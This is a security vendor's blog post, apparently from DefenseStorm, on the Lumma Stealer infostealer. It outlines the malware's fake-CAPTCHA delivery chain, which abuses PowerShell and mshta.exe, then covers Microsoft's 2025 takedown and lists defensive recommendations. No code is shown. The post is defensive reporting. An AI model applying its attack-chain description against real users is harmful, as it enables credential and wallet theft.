Living Off the Land: How Lumma Stealer Weaponized Legitimate Windows Tools

In the ever-evolving world of cybersecurity, threats are becoming more sophisticated, stealthy, and scalable. One such threat that has made headlines in 2025 is Lumma Stealer—a powerful information-stealing malware that has wreaked havoc across the globe.

Lumma Stealer, also known as LummaC2, is a Malware-as-a-Service (MaaS) platform that allows cybercriminals to rent and deploy malware designed to steal sensitive information from infected devices. First surfacing in 2022, it has rapidly evolved into one of the most notorious infostealers on the dark web.

Among the many sophisticated delivery methods used by Lumma Stealer, one particularly stealthy and effective technique involves abusing mshta.exe, a legitimate Windows utility used to execute HTML Applications (HTA files). This method allows attackers to bypass traditional defenses and execute malicious payloads with minimal user interaction.

Key Features:

• Credential Harvesting: Extracts saved usernames and passwords from browsers.
• Cookie Theft: Captures session cookies to hijack user sessions.
• Credit Card Data: Steals payment information stored in browsers.
• Crypto Wallet Hijacking: Targets both hot and cold wallets.
• 2FA Bypass: Collects authentication tokens and backup codes.
• Loader Capabilities: Can download and execute additional malware payloads.

How It Works

Lumma Stealer is typically distributed through phishing emails, malicious downloads, or fake software updates. Once executed, it silently collects data and sends it to a command-and-control (C2) server operated by the attacker. The malware is modular, allowing threat actors to customize its behavior based on their goals.

In recent attacks, Lumma Stealer has begun using a very effective technique which involve abusing mshta.exe, a legitimate Windows utility used to execute HTML Applications (HTA files). Before we go through the attack chain, we must first understand what is mshta.exe? mshta.exe is a built-in Windows binary that executes .hta files—HTML applications that can contain VBScript or JavaScript. Due to it being a trusted system component, it’s often whitelisted by security tools, making it a prime target for abuse in Living-off-the-Land Binaries (LOLBins) attacks.

Referencing recent attacks, here’s how Lumma Stealer operators have used mshta.exe in their active campaigns:

• Initial Lure: Victims are tricked into visiting a fake CAPTCHA page hosted on a compromised or malicious site.
• User Interaction: When the user clicks the “I’m not a robot” button, a Base64-encoded PowerShell script is copied to the clipboard or executed directly
• Payload Delivery:
  • The PowerShell script downloads a remote HTA file.
  • This HTA file is then executed using mshta.exe, which downloads and runs a malicious PE file (e.g., a trojanized version of Dialer.exe).
• Script Execution:
• • The PE file contains an overlay section with embedded JavaScript.
  • This script is obfuscated and uses polyglot techniques—embedding valid HTA content inside other file types to evade detection.

• Final Payload: The script ultimately downloads and executes the Lumma Stealer binary, which begins harvesting credentials, cookies, crypto wallets, and more.

Global Disruption: Microsoft’s Crackdown

In a win for cybersecurity, Microsoft’s Digital Crimes Unit (DCU) led a global operation in May 2025 to dismantle Lumma Stealer’s infrastructure. This effort, in collaboration with the U.S. Department of Justice, Europol, and Japan’s JC3, resulted in:

• Seizure of over 2,300 malicious domains
• Shutdown of multiple C2 servers
• Redirection of traffic to Microsoft-controlled sinkholes
• Mitigation of over 394,000 infected Windows devices

This takedown significantly disrupted the malware’s operations and its underground marketplace, where it was being sold to cybercriminals for as little as $250/month.

Reference: https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/

DefenseStorm Recommendations

While Microsoft’s effort should help significantly slow down the operations of Lumma Stealer for the time being, it is important to remember that this service is not going anywhere and it is important to always remain vigilant.

Here are a couple of ways to defend against this threat:

• Block or Monitor mshta.exe: If not needed in your environment, disable or restrict its use via AppLocker or Windows Defender Application Control (WDAC).
• Behavioral Detection: Use EDR tools to detect suspicious child processes spawned by mshta.exe, especially those involving PowerShell or network activity.
• Email and Web Filtering: Prevent access to known malicious domains and block phishing attempts that lead to fake CAPTCHA pages.
• User Awareness: Train users to recognize suspicious prompts and avoid interacting with unexpected CAPTCHA or verification pages.

As always, DefenseStorm recommends the following:

• Continued internal training for phishing campaigns
• Block threat indicators at their respective controls
• Keep all systems and software updated to the latest patched versions to best protect against all known security vulnerabilities
• Maintain a strong password policy
• Enable multi-factor authentication
• Regularly back up data, air gap, and password backup copies offline
• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location
• Use app hardening
• Restrict administrative access